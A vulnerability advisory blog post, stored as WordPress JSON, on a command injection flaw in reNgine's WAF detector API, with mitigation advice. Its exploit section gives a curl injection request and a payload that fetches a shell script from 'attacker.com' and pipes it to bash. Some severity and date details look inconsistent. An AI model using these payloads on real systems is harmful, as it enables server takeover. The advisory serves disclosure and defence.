{"id":18366,"date":"2025-04-06T05:07:59","date_gmt":"2025-04-06T05:07:59","guid":{"rendered":""},"modified":"2025-09-16T12:32:08","modified_gmt":"2025-09-16T18:32:08","slug":"cve-2023-50094-authenticated-command-injection-vulnerability-in-rengine","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2023-50094-authenticated-command-injection-vulnerability-in-rengine\/","title":{"rendered":"CVE-2023-50094: Authenticated Command Injection Vulnerability in reNgine"},"content":{"rendered":"<h2 class=\"\" data-start=\"198\" data-end=\"209\">Overview<\/h2>\n<p class=\"\" data-start=\"211\" data-end=\"575\">CVE-2023-50094 is a critical authenticated command injection vulnerability discovered in reNgine, an automated reconnaissance framework widely used by penetration testers and bug bounty hunters. This flaw allows authenticated users to execute arbitrary shell commands on the reNgine host, leading to full system compromise in vulnerable configurations.<\/p>\n<p class=\"\" data-start=\"577\" data-end=\"824\">Due to the nature of reNgine as a network-facing recon tool with command-line integration, exploitation of this vulnerability could provide attackers with persistent shell access, privilege escalation pathways, and data exfiltration opportunities.<\/p>\n<h2 class=\"\" data-start=\"831\" data-end=\"855\">Vulnerability Summary<\/h2>\n<div class=\"group pointer-events-none relative flex justify-center *:pointer-events-auto\">\n<div class=\"tableContainer horzScrollShadows relative\">\n<table class=\"min-w-full\" data-start=\"857\" data-end=\"1511\">\n<thead data-start=\"857\" data-end=\"929\">\n<tr data-start=\"857\" data-end=\"929\">\n<th data-start=\"857\" data-end=\"882\">Field<\/th>\n<th data-start=\"882\" data-end=\"929\">Detail<\/th>\n<\/tr>\n<\/thead>\n<tbody data-start=\"1003\" data-end=\"1511\">\n<tr data-start=\"1003\" data-end=\"1075\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1003\" 
data-end=\"1028\"><strong data-start=\"1005\" data-end=\"1015\">CVE ID<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1028\" data-end=\"1075\">CVE-2023-50094<\/td>\n<\/tr>\n<tr data-start=\"1076\" data-end=\"1148\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1076\" data-end=\"1101\"><strong data-start=\"1078\" data-end=\"1090\">Severity<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1101\" data-end=\"1148\">Critical (CVSS Score: 8.8)<\/td>\n<\/tr>\n<tr data-start=\"1149\" data-end=\"1221\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1149\" data-end=\"1174\"><strong data-start=\"1151\" data-end=\"1168\">Attack Vector<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1174\" data-end=\"1221\">Network<\/td>\n<\/tr>\n<tr data-start=\"1222\" data-end=\"1293\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1222\" data-end=\"1247\"><strong data-start=\"1224\" data-end=\"1247\">Privileges Required<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1247\" data-end=\"1293\">Low (<a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-5821-critical-authentication-bypass-vulnerability-in-case-theme-user-plugin-for-wordpress\/\"  data-wpil-monitor-id=\"83288\">Authenticated User<\/a>)<\/td>\n<\/tr>\n<tr data-start=\"1294\" data-end=\"1366\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1294\" data-end=\"1319\"><strong data-start=\"1296\" data-end=\"1316\">User Interaction<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1319\" data-end=\"1366\">None<\/td>\n<\/tr>\n<tr data-start=\"1367\" data-end=\"1439\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1367\" data-end=\"1392\"><strong 
data-start=\"1369\" data-end=\"1379\">Impact<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1392\" data-end=\"1439\"><a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-45199-remote-code-execution-vulnerability-in-insightsoftware-hive-jdbc\/\"  data-wpil-monitor-id=\"29920\">Remote Code Execution<\/a> (RCE)<\/td>\n<\/tr>\n<tr data-start=\"1440\" data-end=\"1511\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1440\" data-end=\"1465\"><strong data-start=\"1442\" data-end=\"1463\">Affected Endpoint<\/strong><\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1465\" data-end=\"1511\"><code class=\"\" data-line=\"\">\/api\/tools\/waf_detector\/<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<h2 class=\"\" data-start=\"1518\" data-end=\"1538\">Affected Products<\/h2>\n<div class=\"group pointer-events-none relative flex justify-center *:pointer-events-auto\">\n<div class=\"tableContainer horzScrollShadows relative\">\n<table class=\"min-w-full\" data-start=\"1540\" data-end=\"1649\">\n<thead data-start=\"1540\" data-end=\"1575\">\n<tr data-start=\"1540\" data-end=\"1575\">\n<th data-start=\"1540\" data-end=\"1550\">Product<\/th>\n<th data-start=\"1550\" data-end=\"1575\">Affected Versions<\/th>\n<\/tr>\n<\/thead>\n<tbody data-start=\"1613\" data-end=\"1649\">\n<tr data-start=\"1613\" data-end=\"1649\">\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1613\" data-end=\"1623\">reNgine<\/td>\n<td class=\"max-w-[calc(var(--thread-content-max-width)*2\/3)]\" data-start=\"1623\" data-end=\"1649\">v1.2.0 to v2.0.2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<h2 class=\"\" data-start=\"1656\" data-end=\"1680\">How the Exploit Works<\/h2>\n<p class=\"\" data-start=\"1682\" data-end=\"1902\">The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-2905-critical-xxe-vulnerability-in-wso2-api-manager-gateway\/\"  
data-wpil-monitor-id=\"43110\">vulnerability is located in the WAF detection API<\/a> route (<code class=\"\" data-line=\"\">\/api\/tools\/waf_detector\/<\/code>) where the <code class=\"\" data-line=\"\">url<\/code> parameter is directly interpolated into a shell command using Python\u2019s <code class=\"\" data-line=\"\">subprocess.check_output<\/code> with <code class=\"\" data-line=\"\">shell=True<\/code>.<\/p>\n<p class=\"\" data-start=\"1904\" data-end=\"2154\">Because the input is not sanitized, attackers can <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-25053-os-command-injection-vulnerability-in-wi-fi-ap-unit-ac-wps-11ac-series\/\"  data-wpil-monitor-id=\"31375\">inject arbitrary commands<\/a> using shell metacharacters like <code class=\"\" data-line=\"\">;<\/code>, <code class=\"\" data-line=\"\">&amp;&amp;<\/code>, or <code class=\"\" data-line=\"\">|<\/code>. If the application is running with elevated privileges (e.g., as root inside Docker), this can <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3328-buffer-overflow-vulnerability-in-tenda-ac1206-could-lead-to-system-compromise\/\"  data-wpil-monitor-id=\"29857\">lead to full system<\/a> control.<\/p>\n<h2 class=\"\" data-start=\"2161\" data-end=\"2190\">Conceptual Exploit Example<\/h2>\n<p class=\"\" data-start=\"2192\" data-end=\"2274\">Here is a conceptual example demonstrating how an <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3200-unauthenticated-remote-attacker-exploiting-insecure-tls-protocols\/\"  data-wpil-monitor-id=\"41542\">attacker could exploit<\/a> the flaw:<\/p>\n<div class=\"contain-inline-size rounded-md border-[0.5px] border-token-border-medium relative bg-token-sidebar-surface-primary\">\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"\" data-line=\"\">curl -k &#039;https:\/\/target-host\/api\/tools\/waf_detector\/?format=json&amp;url=;id&#039; \\<br \/>\n  -H 
&#039;Cookie: sessionid=VALID_SESSION_ID&#039;<br \/>\n<\/code><\/div>\n<\/div>\n<p class=\"\" data-start=\"2407\" data-end=\"2562\">In this example, the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-32931-critical-os-command-injection-vulnerability-in-devdojo-voyager\/\"  data-wpil-monitor-id=\"33560\">command <code class=\"\" data-line=\"\">id<\/code> is injected<\/a> via the <code class=\"\" data-line=\"\">url<\/code> parameter and executed on the server. An attacker could replace this with any payload, such as:<\/p>\n<div class=\"contain-inline-size rounded-md border-[0.5px] border-token-border-medium relative bg-token-sidebar-surface-primary\">\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"\" data-line=\"\">;curl http:\/\/attacker.com\/shell.sh|bash<br \/>\n<\/code><\/div>\n<\/div>\n<p class=\"\" data-start=\"2617\" data-end=\"2671\">This results in full remote <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-41788-critical-code-execution-vulnerability-in-sentron-7kt-pac1260-data-manager\/\"  data-wpil-monitor-id=\"30695\">code execution<\/a> on the server.<\/p>\n<h2 class=\"\" data-start=\"2678\" data-end=\"2711\">Recommendations for Mitigation<\/h2>\n<p class=\"\" data-start=\"2713\" data-end=\"2766\">To mitigate the risks associated with CVE-2023-50094:<\/p>\n<ul data-start=\"2768\" data-end=\"3483\">\n<li class=\"\" data-start=\"2768\" data-end=\"2913\">\n<p class=\"\" data-start=\"2770\" data-end=\"2913\">Update reNgine Immediately<br data-start=\"2800\" data-end=\"2803\" \/>Upgrade to version 2.1.2 or later, which properly <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-31234-input-sanitization-flaw-leading-to-system-termination-and-kernel-memory-corruption\/\"  data-wpil-monitor-id=\"83289\">sanitizes inputs<\/a> and removes unsafe shell invocations.<\/p>\n<\/li>\n<li class=\"\" data-start=\"2915\" data-end=\"3030\">\n<p class=\"\" 
data-start=\"2917\" data-end=\"3030\">Restrict <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-45616-incorrect-access-control-vulnerability-in-the-admin-api-of-brcc-v1-2-0\/\"  data-wpil-monitor-id=\"43324\">API Access<\/a><br data-start=\"2940\" data-end=\"2943\" \/>Limit access to reNgine\u2019s API endpoints via IP whitelisting, <a class=\"wpil_keyword_link\" href=\"https:\/\/ameeba.com\"   title=\"VPN\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"29354\">VPN<\/a>, or reverse proxies.<\/p>\n<\/li>\n<li class=\"\" data-start=\"3032\" data-end=\"3199\">\n<p class=\"\" data-start=\"3034\" data-end=\"3199\">Run with Least Privilege<br data-start=\"3062\" data-end=\"3065\" \/>Ensure the reNgine process does not run with <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-30389-unauthorized-privilege-elevation-in-azure-bot-framework-sdk\/\"  data-wpil-monitor-id=\"42397\">elevated privileges<\/a>. Consider <a class=\"wpil_keyword_link\" href=\"https:\/\/www.ameeba.com\"   title=\"sandboxing\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"29355\">sandboxing<\/a> it with Docker or similar container isolation.<\/p>\n<\/li>\n<li class=\"\" data-start=\"3201\" data-end=\"3300\">\n<p class=\"\" data-start=\"3203\" data-end=\"3300\">Audit User Roles<br data-start=\"3223\" data-end=\"3226\" \/>Reassess access permissions for users of the reNgine <a class=\"wpil_keyword_link\" href=\"https:\/\/chat.ameeba.com\"   title=\"interface\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"29356\">interface<\/a> and APIs.<\/p>\n<\/li>\n<li class=\"\" data-start=\"3302\" data-end=\"3483\">\n<p class=\"\" data-start=\"3304\" data-end=\"3483\">Sanitize User Input<br data-start=\"3327\" data-end=\"3330\" \/>Never pass user-controlled input to <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-11861-critical-command-injection-vulnerability-in-enersys-ampa-granting-privileged-remote-shell-access\/\"  data-wpil-monitor-id=\"45218\">shell commands<\/a>. 
Use safe <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-34087-code-execution-vulnerability-in-gtkwave-3-3-115-through-improper-array-index-validation\/\"  data-wpil-monitor-id=\"41541\">execution patterns such as argument arrays<\/a> with <code class=\"\" data-line=\"\">subprocess.run()<\/code> (without <code class=\"\" data-line=\"\">shell=True<\/code>).<\/p>\n<\/li>\n<\/ul>\n<h2 class=\"\" data-start=\"3490\" data-end=\"3514\">Timeline and Response<\/h2>\n<ul data-start=\"3516\" data-end=\"3657\">\n<li class=\"\" data-start=\"3516\" data-end=\"3543\">\n<p class=\"\" data-start=\"3518\" data-end=\"3543\">Reported: July 2024<\/p>\n<\/li>\n<li class=\"\" data-start=\"3544\" data-end=\"3574\">\n<p class=\"\" data-start=\"3546\" data-end=\"3574\">Patched: July 23, 2024<\/p>\n<\/li>\n<li class=\"\" data-start=\"3575\" data-end=\"3607\">\n<p class=\"\" data-start=\"3577\" data-end=\"3607\">Fixed In: reNgine v2.1.2<\/p>\n<\/li>\n<li class=\"\" data-start=\"3608\" data-end=\"3657\">\n<p class=\"\" data-start=\"3610\" data-end=\"3657\">Disclosed By: GitHub Security Advisory Team<\/p>\n<\/li>\n<\/ul>\n<h2 class=\"\" data-start=\"3664\" data-end=\"3683\">Closing Thoughts<\/h2>\n<p class=\"\" data-start=\"3685\" data-end=\"3959\">CVE-2023-50094 reinforces the importance of never trusting user input, especially when invoking system-level operations in web-based automation tools. 
In highly extensible systems like reNgine, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-6634-command-injection-vulnerability-in-learnpress-wordpress-plugin\/\"  data-wpil-monitor-id=\"34517\">command injection<\/a> flaws can turn into full takeover vectors if left unaddressed.<\/p>\n<p class=\"\" data-start=\"3961\" data-end=\"4133\">Users and organizations relying on <a href=\"https:\/\/www.ameeba.com\/blog\/fortinet-s-fortigate-vulnerability-ssl-vpn-symlink-exploit-puts-user-access-at-risk-post-patching\/\"  data-wpil-monitor-id=\"30038\">reNgine<\/a> should patch immediately and audit all instances to prevent unauthorized access or persistence from previously exploited systems.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview CVE-2023-50094 is a critical authenticated command injection vulnerability discovered in reNgine, an automated reconnaissance framework widely used by penetration testers and bug bounty hunters. This flaw allows authenticated users to execute arbitrary shell commands on the reNgine host, leading to full system compromise in vulnerable configurations. 
Due to the nature of reNgine as a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[92,79],"product":[],"attack_vector":[78,76,80],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-18366","post","type-post","status-publish","format-standard","hentry","category-uncategorized","vendor-docker","vendor-github","attack_vector-injection","attack_vector-privilege-escalation","attack_vector-rce"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/18366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=18366"}],"version-history":[{"count":28,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/18366\/revisions"}],"predecessor-version":[{"id":75830,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/18366\/revisions\/75830"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=18366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=18366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=18366"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=18366"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=18366"},{"taxonomy":"attack_vector","embeddable":true,
"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=18366"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=18366"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=18366"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=18366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}